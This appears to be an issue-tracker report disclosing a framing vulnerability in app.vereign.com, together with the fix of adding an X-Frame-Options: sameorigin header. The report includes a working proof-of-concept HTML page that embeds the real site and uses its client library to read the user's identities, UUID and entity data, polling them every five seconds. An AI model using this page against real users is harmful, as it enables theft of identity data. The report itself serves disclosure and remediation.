Hacker can create some site with app.vereign.com in iframe and get user data in case user enters the pincode
Example:
The fake.html code is:
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="robots" content="noindex">
<style>
html, body {
height: 100%;
}
body {
margin: 0;
padding: 0;
overflow: hidden;
}
iframe {
display: none;
width: 100%;
height: 100%;
}
</style>
</head>
<body>
<script src="https://app.vereign.com/vcl/js/client"></script>
<script>
window.setupViamAPI(
"hackDiv",
{
onEvent: () => {}
},
"https://app.vereign.com/vcl/js/iframe",
"https://app.vereign.com/api/",
"https://app.vereign.com/wopi/",
"https://app.vereign.com"
).then(async function(lib) {
window.lib = lib;
console.log("Injected: Lib is initialized");
var identities = await lib.listIdentities();
console.log("Injected: User identities: ", identities);
var currentUUID = await lib.getCurrentlyLoggedInUUID();
console.log("Injected: Current UUID: ", currentUUID.data);
var entity = await lib.entityGetEntity(currentUUID.data);
console.log("Injected: Current entity: ", entity);
setInterval(async function() {
var entity = await lib.entityGetEntity(currentUUID.data);
console.log("Injected: Current entity: ", entity);
}, 5000);
});
</script>
<div id="hackDiv"></div>
<iframe style="display: block;" src="https://app.vereign.com"></iframe>
</body>
</html>Solution:
Add a special HTTP header to the app.vereign.com, so we deny to open app.vereign.com in iframe
X-Frame-Options: sameorigin
Activity
mentioned in issue #48
implementation will be in a context of this https://code.vereign.com/code/dashboard/issues/719
mentioned in issue #41
Please register or sign in to reply